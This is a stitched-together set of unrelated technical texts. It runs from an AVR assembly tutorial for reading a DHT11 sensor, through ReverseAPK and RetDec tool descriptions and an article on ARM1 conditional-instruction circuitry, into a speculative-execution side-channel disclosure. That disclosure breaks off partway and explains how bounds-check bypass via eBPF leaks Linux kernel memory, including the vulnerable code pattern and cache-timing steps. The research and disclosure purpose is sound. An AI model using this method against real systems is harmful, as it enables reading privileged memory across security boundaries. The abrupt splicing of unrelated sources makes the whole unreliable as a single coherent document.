Для того чтобы передавать данные в большой компьютер будем использовать USART контроллера, который через USB кабель будет передавать данные в программу — терминал, например PuTTY. Передаем опять же тупо в лоб — засовываем байт в нужный регистр управления USART-а и ждем, когда он передастся. Для удобства я также использовал пару подпрограмм, типа — передать несколько байт, начиная с адреса в Y, ну и перевести каретку в терминале для красоты.

;============	SEND 1 BYTE VIA USART =====================
SEND_BYTE:	NOP
SEND_BYTE_L1:	LDS Tmp1, UCSR0A
		SBRS Tmp1, UDRE0			; если регистр данных пустой
		RJMP SEND_BYTE_L1
		STS UDR0, USART_ByteR		; то шлем байт из R17
		NOP
		RET				

;============	SEND CRLF VIA USART ===============================
SEND_CRLF:	LDI USART_ByteR, $0D
		RCALL SEND_BYTE	
		LDI USART_ByteR, $0A
		RCALL SEND_BYTE
		RET			

;============	SEND N BYTES VIA USART ============================
; Y - что слать, USART_BytesN - сколько байт
SEND_BYTES:	NOP
SBS_L1:		LD USART_ByteR, Y+
		RCALL SEND_BYTE
		DEC USART_BytesN
		BRNE SBS_L1
		RET

Отправив в терминал число отсчётов для 80 интервалов, можно попробовать собрать собственно значащие биты. Делать будем как написано в учебнике, т.е. в datasheet — попарно сравним число циклов первого «полубита» с числом циклов второго. Если вторые пол-бита короче — значит это закодировать ноль, если длиннее — то единица. После сравнения биты накапливаем в аккумуляторе и сохраняем в память по-байтово начиная с адреса BITS.

;=============	GET BITS ===============================================
; Из Cycles делаем байты в  BITS				
GET_BITS:			LDI Tmp1, 5			; для пяти байт - готовим счетчики
				LDI Tmp2, 8			; для каждого бита
				LDI ZH, High(CYCLES)	; загрузили старшйи байт адреса Cycles
				LDI ZL, Low (CYCLES)	; загрузили младший байт адреса Cycles
				LDI YH, High(BITS)	; загрузили старший байт адреса BITS
				LDI YL, Low (BITS)	; загрузили младший байт адреса BITS

ACC:				LDI ACCUM, 0			; акамулятор инициализировали
				LDI Tmp2, 8			; для каждого бита

TO_ACC:				LSL ACCUM				; сдвинули влево
				LD Tmp3, Z+			; считали данные [i]
				LD Tmp4, Z+			; о циклах и [i+1]
				CP Tmp3, Tmp4			; сравнить первые пол бита с второй половину бита если положительно - то BITS=0, если отрицительно то BITS=1
				BRPL J_SHIFT		; если положительно (0) то просто сдвиг	
				ORI ACCUM, 1			; если отрицательно (1) то добавили 1
J_SHIFT:			DEC Tmp2				; повторить для 8 бит
				BRNE TO_ACC
				ST Y+, ACCUM			; сохранили акамулятор
				DEC Tmp1				; для пяти байт
				BRNE ACC
				RET

Итак, здесь мы собрали в памяти начиная с метки BITS те пять байт, которые передал контроллер. Но работать с ними в таком формате не очень неудобно, поскольку в памяти это выглядит примерно, как:
34002100ХХ, где 34 — это влажность целая часть, 00 — данные после запятой влажности, 21 — температура, 00 — опять данные после запятой температуры, ХХ — контрольная сумма. А нам надо бы вывести в терминал красиво типа «Temperature = 21.00». Так что для удобства, растащим данные по отдельным переменным.

Определения

H10:			.byte 1		; чиcло - целая часть влажность
H01:			.byte 1		; число - дробная часть влажность
T10:			.byte 1		; число - целая часть температура в C
T01:			.byte 1		; число - дробная часть температура

И сохраняем байты из BITS в нужные переменные

;============	GET HnT DATA =========================================
; из BITS вытаскиваем цифры H10...
; !!! чуть хакнули, потому что H10 и дальше... лежат последовательно в памяти

GET_HnT_DATA:	NOP

				LDI ZH, HIGH(BITS)
				LDI ZL, LOW(BITS)
				LDI XH, HIGH(H10)
				LDI XL, LOW(H10)
												; TODO - перевести на счетчик таки
				LD Tmp1, Z+			; Считали
				ST X+, Tmp1			; сохранили
				
				LD Tmp1, Z+			; Считали
				ST X+, Tmp1			; сохранили

				LD Tmp1, Z+			; Считали
				ST X+, Tmp1			; сохранили

				LD Tmp1, Z+			; Считали
				ST X+, Tmp1			; сохранили

				RET

После этого преобразуем цифры в коды ASCII, чтобы данные можно было нормально прочитать в терминале, добавляем названия данных, ну там «температура» из флеша и шлем в COM порт в терминал.

PuTTY с данными

Для того, чтобы это измерять температуру регулярно добавляем вечный цикл с задержкой порядка 1200 миллисекунд, поскольку datasheet DHT11 говорит, что не рекомендуется опрашивать датчик чаще чем 1 раз в секунду.

Основной цикл после этого выглядит примерно так:

;============	MAIN
			;!!! Главный вход
RESET:			NOP		

			; Internal Hardware Init
			CLI		; нам прерывания не нужны пока
				
			; stack init		
			LDI Tmp1, Low(RAMEND)
			OUT SPL, Tmp1
			LDI Tmp1, High(RAMEND)
			OUT SPH, Tmp1

			RCALL USART0_INIT

			; Init data
			RCALL COPY_STRINGS		; скопировали данные в RAM
			RCALL TEST_DATA			; подготовили тестовые данные

loop:				NOP						; крутимся в вечном цикле ....
				; External Hardware Init
				RCALL DHT_INIT
				; получили здесь подтверждение контроллера и надо в темпе читать биты
				RCALL READ_CYCLES
				; критичная ко времени секция завершилась...
				
				;Тест - отправить Cycles в USART		
				;RCALL TEST_CYCLES
				
				; получаем из посылки биты
				RCALL GET_BITS
				
				;Тест - отправить BITS в USART
				;RCALL TEST_BITS  
				
				; получаем из BITS цифровые данные
				RCALL GET_HnT_DATA
				
				;Тест - отправить 4 байта начиная с H10 в USART
				;RCALL TEST_H10_T01
				
				; подготовидли температуру и влажность в ASCII		
				RCALL HnT_ASCII_DATA_EX
				
				; Отправить готовую температуру (надпись и ASCII данные) в USART
				RCALL PRINT_TEMPER
				; Отправить готовую влажность (надпись и ASCII данные) в USART
				RCALL PRINT_HUMID
				; переведем строку дял красоты				
				RCALL SEND_CRLF
							
				RCALL DELAY_1200MS				;повторяем каждые 1.2 секунды 
				rjmp loop		; зациклились

Прошиваем, подключаем USB-TTL кабель (преобразователь)к компьютеру, запускаем терминал, выбираем правильный виртуальный COM порта и наслаждаемся нашим новым цифровым термометром. Для проверки можно погреть датчик в руке — у меня температура при этом растет, а влажность как ни странно уменьшается.

Ссылки по теме:
AVR Delay Calc
Как подключить Arduino для программирования в Atmel Studio 7
DHT11 Datasheet
ATmega DataSheet
Atmel AVR 8-bit Instruction Set
Atmel Studio
Код примера на github

ReverseAPK — Quickly Analyze And Reverse Engineer Android Packages

Quickly analyze and reverse engineer Android applications.

FEATURES:

  • Displays all extracted files for easy reference
  • Automatically decompile APK files to Java and Smali format
  • Analyze AndroidManifest.xml for common vulnerabilities and behavior
  • Static source code analysis for common vulnerabilities and behavior
    • Device info
    • Intents
    • Command execution
    • SQLite references
    • Logging references
    • Content providers
    • Broadcast recievers
    • Service references
    • File references
    • Crypto references
    • Hardcoded secrets
    • URL’s
    • Network connections
    • SSL references
    • WebView references

INSTALL:

./install

USAGE:

reverse-apk <apk_name>

 

Retargetable Machine-Code Decompiler: RetDec

RetDec is a retargetable machine-code decompiler based on LLVM. The decompiler is not limited to any particular target architecture, operating system, or executable file format:

  • Supported file formats: ELF, PE, Mach-O, COFF, AR (archive), Intel HEX, and raw machine code.
  • Supported architectures (32b only): Intel x86, ARM, MIPS, PIC32, and PowerPC.

 

Features:

  • Static analysis of executable files with detailed information.
  • Compiler and packer detection.
  • Loading and instruction decoding.
  • Signature-based removal of statically linked library code.
  • Extraction and utilization of debugging information (DWARF, PDB).
  • Reconstruction of instruction idioms.
  • Detection and reconstruction of C++ class hierarchies (RTTI, vtables).
  • Demangling of symbols from C++ binaries (GCC, MSVC, Borland).
  • Reconstruction of functions, types, and high-level constructs.
  • Integrated disassembler.
  • Output in two high-level languages: C and a Python-like language.
  • Generation of call graphs, control-flow graphs, and various statistics.

 

After seven years of development, Avast open-sources its machine-code decompiler for platform-independent analysis of executable files. Avast released its analytical tool, RetDec, to help the cybersecurity community fight malicious software. The tool allows anyone to study the code of applications to see what the applications do, without running them. The goal behind open sourcing RetDec is to provide a generic tool to transform platform-specific code, such as x86/PE executable files, into a higher form of representation, such as C source code. By generic, we mean that the tool should not be limited to a single platform, but rather support a variety of platforms, including different architectures, file formats, and compilers. At Avast, RetDec is actively used for analysis of malicious samples for various platforms, such as x86/PE and ARM/ELF.

 

What is a decompiler?

A decompiler is a program that takes an executable file as its input and attempts to transform it into a high-level representation while preserving its functionality. For example, the input file may be application.exe, and the output can be source code in a higher-level programming language, such as C. A decompiler is, therefore, the exact opposite of a compiler, which compiles source files into executable files; this is why decompilers are sometimes also called reverse compilers.

By preserving a program’s functionality, we want the source code to reflect what the input program does as accurately as possible; otherwise, we risk assuming the program does one thing, when it really does another.

Generally, decompilers are unable to perfectly reconstruct original source code, due to the fact that a lot of information is lost during the compilation process. Furthermore, malware authors often use various obfuscation and anti-decompilation tricks to make the decompilation of their software as difficult as possible.

RetDec addresses the above mentioned issues by using a large set of supported architectures and file formats, as well as in-house heuristics and algorithms to decode and reconstruct applications. RetDec is also the only decompiler of its scale using a proven LLVM infrastructure and provided for free, licensed under MIT.

Decompilers can be used in a variety of situations. The most obvious is reverse engineering when searching for bugs, vulnerabilities, or analyzing malicious software. Decompilation can also be used to retrieve lost source code when comparing two executables, or to verify that a compiled program does exactly what is written in its source code.

There are several important differences between a decompiler and a disassembler. The former tries to reconstruct an executable file into a platform-agnostic, high-level source code, while the latter gives you low-level, platform-specific assembly instructions. The assembly output is non-portable, error-prone when modified, and requires specific knowledge about the instruction set of the target processor. Another positive aspect of decompilers is the high-level source code they produce, like  C source code, which can be read by people who know nothing about the assembly language for the particular processor being analyzed.

 

Installation and Use

Currently,RetDec support only Windows (7 or later) and Linux.

 

Windows

  1. Either download and unpack a pre-built package from the following list, or build and install the decompiler by yourself (the process is described below):
  2. Install Microsoft Visual C++ Redistributable for Visual Studio 2015.
  3. Install MSYS2 and other needed applications by following RetDec’s Windows environment setup guide.
  4. Now, you are all set to run the decompiler. To decompile a binary file named test.exe, go into $RETDEC_INSTALLED_DIR/bin and run:
    bash decompile.sh test.exe
    

    For more information, run bash decompile.sh --help.

 

Linux

  1. There are currently no pre-built packages for Linux. You will have to build and install the decompiler by yourself. The process is described below.
  2. After you have built the decompiler, you will need to install the following packages via your distribution’s package manager:
  3. Now, you are all set to run the decompiler. To decompile a binary file named test.exe, go into $RETDEC_INSTALLED_DIR/bin and run:
    ./decompile.sh test.exe
    

    For more information, run ./decompile.sh --help.

 

Build and Installation


Requirements

Linux

On Debian-based distributions (e.g. Ubuntu), the required packages can be installed with apt-get:

sudo apt-get install build-essential cmake git perl python bash coreutils wget bc graphviz upx flex bison zlib1g-dev libtinfo-dev autoconf pkg-config m4 libtool

 

Windows

  • Microsoft Visual C++ (version >= Visual Studio 2015 Update 2)
  • Git
  • MSYS2 and some other applications. Follow RetDec’s Windows environment setup guide to get everything you need on Windows.
  • Active Perl. It needs to be the first Perl in PATH, or it has to be provided to CMake using CMAKE_PROGRAM_PATH variable, e.g. -DCMAKE_PROGRAM_PATH=/c/perl/bin.
  • Python (version >= 3.4)

 

Process

Warning: Currently, RetDec has to be installed into a clean, dedicated directory. Do NOT install it into /usr,/usr/local, etc. because our build system is not yet ready for system-wide installations. So, when running cmake, always set -DCMAKE_INSTALL_PREFIX=<path> to a directory that will be used just by RetDec. 

  • Recursively clone the repository (it contains submodules):
    • git clone --recursive https://github.com/avast-tl/retdec
  • Linux:
    • cd retdec
    • mkdir build && cd build
    • cmake .. -DCMAKE_INSTALL_PREFIX=<path>
    • make && make install
  • Windows:
    • Open MSBuild command prompt, or any terminal that is configured to run the msbuild command.
    • cd retdec
    • mkdir build && cd build
    • cmake .. -DCMAKE_INSTALL_PREFIX=<path> -G<generator>
    • msbuild /m /p:Configuration=Release retdec.sln
    • msbuild /m /p:Configuration=Release INSTALL.vcxproj
    • Alternatively, you can open retdec.sln generated by cmake in Visual Studio IDE.

You have to pass the following parameters to cmake:

  • -DCMAKE_INSTALL_PREFIX=<path> to set the installation path to <path>.
  • (Windows only) -G<generator> is -G"Visual Studio 14 2015" for 32-bit build using Visual Studio 2015, or -G"Visual Studio 14 2015 Win64" for 64-bit build using Visual Studio 2015. Later versions of Visual Studio may be used.

You can pass the following additional parameters to cmake:

  • -DRETDEC_DOC=ON to build with API documentation (requires Doxygen and Graphviz, disabled by default).
  • -DRETDEC_TESTS=ON to build with tests, including all the tests in dependency submodules (disabled by default).
  • -DCMAKE_BUILD_TYPE=Debug to build with debugging information, which is useful during development. By default, the project is built in the Release mode. This has no effect on Windows, but the same thing can be achieved by running msbuild with the /p:Configuration=Debug parameter.
  • -DCMAKE_PROGRAM_PATH=<path> to use Perl at <path> (probably useful only on Windows).

Conditional instructions in the ARM1 processor, reverse engineered

By carefully examining the layout of the ARM1 processor, it can be reverse engineered. This article describes the interesting circuit used for conditional instructions: this circuit is marked in red on the die photo below. Unlike most processors, the ARM executes every instruction conditionally. Each instruction specifies a condition and is only executed if the condition is satisfied. For every instruction, the condition circuit reads the condition from the instruction register (blue), evaluates the condition flags (purple), and informs the control logic (yellow) if the instruction should be executed or skipped.

The ARM1 processor chip showing the condition evaluation circuit (red) and the main components it interacts with. Original photo courtesy of Computer History Museum.

The ARM1 processor chip showing the condition evaluation circuit (red) and the main components it interacts with. Original photo courtesy of Computer History Museum.

Why care about the ARM1 chip? It is the highly-influential ancestor of the extremely popular ARM processor. The ARM1 processor got off to a slow start in 1985 but now ARM processors are now sold by the tens of billions; your smart phone probably runs on ARM. This article is part of my series on reverse engineering the ARM1; start with my first article for an overview of the chip.

What are conditional instructions?

A key part of any computer is the ability of a program to change what it is doing based on various conditions. Most computers provide conditional branch instructions, which cause execution to jump to a different part of the program based on various condition flags. For example, consider the code if (x == 0) { do_something }. Compiled to assembly code, this first tests the value of variable x and sets the Zero flag if x is 0. Next, a conditional branch instruction jump over the do_something code if the Zero flag is not set.

The ARM processor takes conditionals much further than other processors: every instruction becomes a conditional instruction. Every instruction includes one of 16 conditions and the instruction is only executed if the condition is true; otherwise the instruction is skipped. (This is also known as predication.) The motivation is to avoid inefficient jumping around in the code.

The ARM manual excerpt below shows how four bits in each 32-bit instruction specify one of 16 conditions. Most of the conditions are straightforward, checking if values are equal, negative, higher, and so forth. Most instructions will use the «always» condition, which simply means the instruction always executes. The opposite «never» condition is not highly useful — an instruction with that condition never executes — but it can be used for a NOP, patching code, or adjusting timing of an instruction sequence.

Every instruction in the ARM processor has one of 16 conditions specified. The instruction is executed only if the condition is satisfied.

Every instruction in the ARM processor has one of 16 conditions specified. The instruction is executed only if the condition is satisfied.

Studying the different conditions reveals much of how the condition circuit works. It is based on four condition flags. The zero (Z) flag is set if a value is zero. The negative (N) flag is set if a value is negative. The carry (C) flag is set if there is a carry or borrow from addition or subtraction. The overflow (V) flag is set if there is an overflow during signed arithmetic (details).

The top three bits of the instruction select one of eight conditions, as highlighted in yellow. The fourth bit selects the condition or its opposite (blue). If the fourth bit is 0, the condition must be true; if the fourth bit is 1, the condition must be false.

Implementation of the circuit

The implementation of the conditional logic circuit matches the above description. First, the eight conditions are generated from the four flags. One of the conditions is selected based on the three instruction bits. If the fourth instruction bit is set, the condition is flipped. The result is 1 if the condition is satisfied, and 0 if the condition is not satisfied. One unexpected part of the circuit is that an undefined instruction or and interrupt causes the condition to be cleared, preventing execution of the instruction. The resulting condition signal output is connected to a control part of the chip, where it causes the instruction to be executed or not, as desired.

The condition code evaluation circuit from the ARM1 processor.

The condition code evaluation circuit from the ARM1 processor.

The diagram above shows the condition code circuit of the chip as it appears in the simulator; this is a zoomed-in version of the red rectangle indicated on the die earlier. The chip consists of multiple layers, indicated by different colors. Transistors appear as red or blue regions. NMOS transistors are red; they turn on with a 1 input and can pull their output low. PMOS transistors (blue) are complementary; they turn on with a 0 input and can pull their output high. Physically above the transistors is the polysilicon wiring layer (green). When polysilicon crosses a transistor it forms the gate (yellow) that controls the transistor. Finally, two layers of metal wiring (gray) are above the polysilicon.

The circuit is arranged in columns. The first column of transistors forms the logic gates to generate the conditions from the flag values. The next column is the multiplexer, a circuit that takes the eight input conditions and selects one. The rightmost column contains 8 NAND gates that decode the three instruction bits into 8 control lines. Each line is fed into the multiplexer to select the corresponding condition. At the right is the wiring for the 3 instruction bits and their complements. A few miscellaneous gates are at the bottom of the multiplexer and decoder columns. These include inverters to complement the instruction bits.

The condition generation gates

The diagram below zooms in on the left third of the circuit above. This part of the circuit uses standard CMOS logic gates to computes the conditions from the flags. Each gate is built from NMOS (red) and PMOS (blue) transistors in a horizontal strip. Comparing the text description of conditions from the manual with the logic shows how the conditions are generated. For instance, the HI (unsigned higher) condition requires flags «C set and Z clear». The top three gates generate this condition. The GE (greater than or equal) condition is more complex, requiring flags «N set and V set, or N clear and V clear». The next two gates compute this value. (Due to the way CMOS gates are constructed, an OR-NAND gate is constructed as a single gate.) Likewise, the other conditions are generated. The AL (always) condition is simply a 1, and doesn’t require any circuitry. The conditions are fed into the multiplexer, which will be discussed below.

The output coming back from the multiplexer is the selected condition, labeled «cond» below. The NAND and OR-NAND gates flip the condition if instruction register bit 28 (ireg28) is set. This implements the eight opposite conditions. The result is labeled «ok», indicating the overall condition is satisfied. The final three gates block instruction execution for an interrupt or undefined instruction.

Gates in the ARM1 processor generate the various conditionals from the flag values.

Gates in the ARM1 processor generate the various conditionals from the flag values.

One thing I’d like to emphasize about the ARM1 is that its layout is very orderly and non-optimized. While it may appear chaotic, the gates are arranged by combining relatively fixed blocks («standard cells») and wiring them together. Each gate forms a strip and the gates are stacked together in columns. The polysilicon and metal layers connect the gates as necessary.

The layout of the ARM1 chip is a consequence of the VLSI Technology chip design software used to create it. The resulting layout is simple, but doesn’t use space very efficiently. Since the ARM1 uses very few transistors for its time, the designers weren’t worried about optimizing the layout. In contrast, earlier chips such as the Z-80 were hand-drawn, with each transistor and wire carefully shaped to use the minimum space possible. The diagram below shows a small part of the Z-80 processor layout, showing the extremely irregular but dense arrangement of the chip. The transistors are not arranged in rows as in the ARM1 above, but fit together to use all the available space.

A detail of the Z-80 processor layout, showing the complex hand-drawn layout. Each transistor and wire is carefully shaped to minimize the chip's size.

A detail of the Z-80 processor layout, showing the complex hand-drawn layout. Each transistor and wire is carefully shaped to minimize the chip’s size.

The multiplexer and decoders

Selecting the desired condition out of the eight possibilities is the job of a circuit called the multiplexer. The multiplexer takes 8 inputs (the conditions) and 8 control signals (based on the instruction) and selects the desired condition. To the right of the multiplexer, 8 NAND gates generate the 8 control signals by decoding the three instruction bits. Each gate simply looks at three bit values and outputs a 0 if the bits select that condition. For instance, if the first two bits are 0 and the third is 1, the gate for condition 1 outputs a 0, selecting that condition in the multiplexer. The animation below shows the circuit as the instruction bits cycle through the eight conditions. You can see the activated condition moving downwards through the circuit.

Animation of the multiplexer in the ARM1 condition code evaluation circuit.

Animation of the multiplexer in the ARM1 condition code evaluation circuit.

While a multiplexer can be built from standard logic gates, the ARM1 multiplexer is built from a different type of circuitry called transmission gates (which the ARM1 also uses in its bit counter). A multiplexer built from transmission gates is more compact and faster than one built from standard logic (NAND gates). One feature of CMOS is that by combining an NMOS transistor and a PMOS transistor in parallel, a transmission gate switch can be built. Feeding 1 into the NMOS gate and 0 into the PMOS gate turns on both transistors and they pass their input through. With the opposite gate values, both transistors turn off and the switch opens. The multiplexer is built from 8 of these CMOS switches. Each condition input feeds into one switch, and the switch outputs are connected together. One switch is turned on at a time, selecting the corresponding input as the output value.

The diagram below shows the schematic of the multiplexer as well as its physical layout on the chip. Only the first three segments of the eight are shown; the remainder are similar. Each input is connected to two transistors forming a CMOS switch. Because the NMOS and PMOS gates require opposite signals, the multiplexer has an inverter for each control signal. Each inverter also consists of two transistors, but wired differently from the switch.

Schematic of the multiplexer inside the ARM1 processor's condition code evaluation circuit.Diagram of the multiplexer inside the ARM1 processor's condition code evaluation circuit.

Schematic and diagram of the multiplexer inside the ARM1 processor’s condition code evaluation circuit.

Working together the decode circuit, inverters, and CMOS switches form the multiplexer that selects the desired condition from the eight choices. The logic described earlier allows this condition to be flipped, for a total of 16 possible conditions.

Conclusion

One unusual feature of the ARM instruction set is that every instruction has a condition associated with it and is only executed if the condition is true. The ARM1 chip is simple enough that the condition circuitry on the chip can be examined and understood at the transistor and gate level. Now that you’ve seen the internals of the condition logic, you can use the Visual ARM1 simulator to see the circuit in action. While the ARM1 may seem like a historical artifact of the 1980s, ARM processors power most smartphones, so there’s probably a similar circuit controlling your phone right now.

AMD ARM Reading privileged memory with a side-channel

We have discovered that CPU data cache timing can be abused to efficiently leak information out of mis-speculated execution, leading to (at worst) arbitrary virtual memory read vulnerabilities across local security boundaries in various contexts.

 

Variants of this issue are known to affect many modern processors, including certain processors by Intel, AMD and ARM. For a few Intel and AMD CPU models, we have exploits that work against real software. We reported this issue to Intel, AMD and ARM on 2017-06-01 [1].

 

So far, there are three known variants of the issue:

 

  • Variant 1: bounds check bypass (CVE-2017-5753)
  • Variant 2: branch target injection (CVE-2017-5715)
  • Variant 3: rogue data cache load (CVE-2017-5754)

 

Before the issues described here were publicly disclosed, Daniel Gruss, Moritz Lipp, Yuval Yarom, Paul Kocher, Daniel Genkin, Michael Schwarz, Mike Hamburg, Stefan Mangard, Thomas Prescher and Werner Haas also reported them; their [writeups/blogposts/paper drafts] are at:

 

 

During the course of our research, we developed the following proofs of concept (PoCs):

 

  1. A PoC that demonstrates the basic principles behind variant 1 in userspace on the tested Intel Haswell Xeon CPU, the AMD FX CPU, the AMD PRO CPU and an ARM Cortex A57 [2]. This PoC only tests for the ability to read data inside mis-speculated execution within the same process, without crossing any privilege boundaries.
  2. A PoC for variant 1 that, when running with normal user privileges under a modern Linux kernel with a distro-standard config, can perform arbitrary reads in a 4GiB range [3] in kernel virtual memory on the Intel Haswell Xeon CPU. If the kernel’s BPF JIT is enabled (non-default configuration), it also works on the AMD PRO CPU. On the Intel Haswell Xeon CPU, kernel virtual memory can be read at a rate of around 2000 bytes per second after around 4 seconds of startup time. [4]
  3. A PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific (now outdated) version of Debian’s distro kernel [5] running on the host, can read host kernel memory at a rate of around 1500 bytes/second, with room for optimization. Before the attack can be performed, some initialization has to be performed that takes roughly between 10 and 30 minutes for a machine with 64GiB of RAM; the needed time should scale roughly linearly with the amount of host RAM. (If 2MB hugepages are available to the guest, the initialization should be much faster, but that hasn’t been tested.)
  4. A PoC for variant 3 that, when running with normal user privileges, can read kernel memory on the Intel Haswell Xeon CPU under some precondition. We believe that this precondition is that the targeted kernel memory is present in the L1D cache.

 

For interesting resources around this topic, look down into the «Literature» section.

 

A warning regarding explanations about processor internals in this blogpost: This blogpost contains a lot of speculation about hardware internals based on observed behavior, which might not necessarily correspond to what processors are actually doing.

 

We have some ideas on possible mitigations and provided some of those ideas to the processor vendors; however, we believe that the processor vendors are in a much better position than we are to design and evaluate mitigations, and we expect them to be the source of authoritative guidance.

 

The PoC code and the writeups that we sent to the CPU vendors are available here:https://bugs.chromium.org/p/project-zero/issues/detail?id=1272.

Tested Processors

  • Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz (called «Intel Haswell Xeon CPU» in the rest of this document)
  • AMD FX(tm)-8320 Eight-Core Processor (called «AMD FX CPU» in the rest of this document)
  • AMD PRO A8-9600 R7, 10 COMPUTE CORES 4C+6G (called «AMD PRO CPU» in the rest of this document)
  • An ARM Cortex A57 core of a Google Nexus 5x phone [6] (called «ARM Cortex A57» in the rest of this document)

Glossary

retire: An instruction retires when its results, e.g. register writes and memory writes, are committed and made visible to the rest of the system. Instructions can be executed out of order, but must always retire in order.

 

logical processor core: A logical processor core is what the operating system sees as a processor core. With hyperthreading enabled, the number of logical cores is a multiple of the number of physical cores.

 

cached/uncached data: In this blogpost, «uncached» data is data that is only present in main memory, not in any of the cache levels of the CPU. Loading uncached data will typically take over 100 cycles of CPU time.

 

speculative execution: A processor can execute past a branch without knowing whether it will be taken or where its target is, therefore executing instructions before it is known whether they should be executed. If this speculation turns out to have been incorrect, the CPU can discard the resulting state without architectural effects and continue execution on the correct execution path. Instructions do not retire before it is known that they are on the correct execution path.

 

mis-speculation window: The time window during which the CPU speculatively executes the wrong code and has not yet detected that mis-speculation has occurred.

Variant 1: Bounds check bypass

This section explains the common theory behind all three variants and the theory behind our PoC for variant 1 that, when running in userspace under a Debian distro kernel, can perform arbitrary reads in a 4GiB region of kernel memory in at least the following configurations:

 

  • Intel Haswell Xeon CPU, eBPF JIT is off (default state)
  • Intel Haswell Xeon CPU, eBPF JIT is on (non-default state)
  • AMD PRO CPU, eBPF JIT is on (non-default state)

 

The state of the eBPF JIT can be toggled using the net.core.bpf_jit_enable sysctl.

Theoretical explanation

The Intel Optimization Reference Manual says the following regarding Sandy Bridge (and later microarchitectural revisions) in section 2.3.2.3 («Branch Prediction»):

 

Branch prediction predicts the branch target and enables the
processor to begin executing instructions long before the branch
true execution path is known.

 

In section 2.3.5.2 («L1 DCache»):

 

Loads can:
[…]
  • Be carried out speculatively, before preceding branches are resolved.
  • Take cache misses out of order and in an overlapped manner.

 

Intel’s Software Developer’s Manual [7] states in Volume 3A, section 11.7 («Implicit Caching (Pentium 4, Intel Xeon, and P6 family processors»):

 

Implicit caching occurs when a memory element is made potentially cacheable, although the element may never have been accessed in the normal von Neumann sequence. Implicit caching occurs on the P6 and more recent processor families due to aggressive prefetching, branch prediction, and TLB miss handling. Implicit caching is an extension of the behavior of existing Intel386, Intel486, and Pentium processor systems, since software running on these processor families also has not been able to deterministically predict the behavior of instruction prefetch.
Consider the code sample below. If arr1->length is uncached, the processor can speculatively load data from arr1->data[untrusted_offset_from_caller]. This is an out-of-bounds read. That should not matter because the processor will effectively roll back the execution state when the branch has executed; none of the speculatively executed instructions will retire (e.g. cause registers etc. to be affected).

 

struct array {
 unsigned long length;
 unsigned char data[];
};
struct array *arr1 = …;
unsigned long untrusted_offset_from_caller = …;
if (untrusted_offset_from_caller < arr1->length) {
 unsigned char value = arr1->data[untrusted_offset_from_caller];
 …
}
However, in the following code sample, there’s an issue. If arr1->length, arr2->data[0x200] andarr2->data[0x300] are not cached, but all other accessed data is, and the branch conditions are predicted as true, the processor can do the following speculatively before arr1->length has been loaded and the execution is re-steered:

 

  • load value = arr1->data[untrusted_offset_from_caller]
  • start a load from a data-dependent offset in arr2->data, loading the corresponding cache line into the L1 cache

 

struct array {
 unsigned long length;
 unsigned char data[];
};
struct array *arr1 = …; /* small array */
struct array *arr2 = …; /* array of size 0x400 */
/* >0x400 (OUT OF BOUNDS!) */
unsigned long untrusted_offset_from_caller = …;
if (untrusted_offset_from_caller < arr1->length) {
 unsigned char value = arr1->data[untrusted_offset_from_caller];
 unsigned long index2 = ((value&1)*0x100)+0x200;
 if (index2 < arr2->length) {
   unsigned char value2 = arr2->data[index2];
 }
}

 

After the execution has been returned to the non-speculative path because the processor has noticed thatuntrusted_offset_from_caller is bigger than arr1->length, the cache line containing arr2->data[index2] stays in the L1 cache. By measuring the time required to load arr2->data[0x200] andarr2->data[0x300], an attacker can then determine whether the value of index2 during speculative execution was 0x200 or 0x300 — which discloses whether arr1->data[untrusted_offset_from_caller]&1 is 0 or 1.

 

To be able to actually use this behavior for an attack, an attacker needs to be able to cause the execution of such a vulnerable code pattern in the targeted context with an out-of-bounds index. For this, the vulnerable code pattern must either be present in existing code, or there must be an interpreter or JIT engine that can be used to generate the vulnerable code pattern. So far, we have not actually identified any existing, exploitable instances of the vulnerable code pattern; the PoC for leaking kernel memory using variant 1 uses the eBPF interpreter or the eBPF JIT engine, which are built into the kernel and accessible to normal users.

 

A minor variant of this could be to instead use an out-of-bounds read to a function pointer to gain control of execution in the mis-speculated path. We did not investigate this variant further.

Attacking the kernel

This section describes in more detail how variant 1 can be used to leak Linux kernel memory using the eBPF bytecode interpreter and JIT engine. While there are many interesting potential targets for variant 1 attacks, we chose to attack the Linux in-kernel eBPF JIT/interpreter because it provides more control to the attacker than most other JITs.

 

The Linux kernel supports eBPF since version 3.18. Unprivileged userspace code can supply bytecode to the kernel that is verified by the kernel and then:

 

  • either interpreted by an in-kernel bytecode interpreter
  • or translated to native machine code that also runs in kernel context using a JIT engine (which translates individual bytecode instructions without performing any further optimizations)

 

Execution of the bytecode can be triggered by attaching the eBPF bytecode to a socket as a filter and then sending data through the other end of the socket.

 

Whether the JIT engine is enabled depends on a run-time configuration setting — but at least on the tested Intel processor, the attack works independent of that setting.

 

Unlike classic BPF, eBPF has data types like data arrays and function pointer arrays into which eBPF bytecode can index. Therefore, it is possible to create the code pattern described above in the kernel using eBPF bytecode.

 

eBPF’s data arrays are less efficient than its function pointer arrays, so the attack will use the latter where possible.

 

Both machines on which this was tested have no SMAP, and the PoC relies on that (but it shouldn’t be a precondition in principle).

 

Additionally, at least on the Intel machine on which this was tested, bouncing modified cache lines between cores is slow, apparently because the MESI protocol is used for cache coherence [8]. Changing the reference counter of an eBPF array on one physical CPU core causes the cache line containing the reference counter to be bounced over to that CPU core, making reads of the reference counter on all other CPU cores slow until the changed reference counter has been written back to memory. Because the length and the reference counter of an eBPF array are stored in the same cache line, this also means that changing the reference counter on one physical CPU core causes reads of the eBPF array’s length to be slow on other physical CPU cores (intentional false sharing).

 

The attack uses two eBPF programs. The first one tail-calls through a page-aligned eBPF function pointer array prog_map at a configurable index. In simplified terms, this program is used to determine the address of prog_map by guessing the offset from prog_map to a userspace address and tail-calling throughprog_map at the guessed offsets. To cause the branch prediction to predict that the offset is below the length of prog_map, tail calls to an in-bounds index are performed in between. To increase the mis-speculation window, the cache line containing the length of prog_map is bounced to another core. To test whether an offset guess was successful, it can be tested whether the userspace address has been loaded into the cache.

 

Because such straightforward brute-force guessing of the address would be slow, the following optimization is used: 215 adjacent userspace memory mappings [9], each consisting of 24 pages, are created at the userspace address user_mapping_area, covering a total area of 231 bytes. Each mapping maps the same physical pages, and all mappings are present in the pagetables.

 

 

 

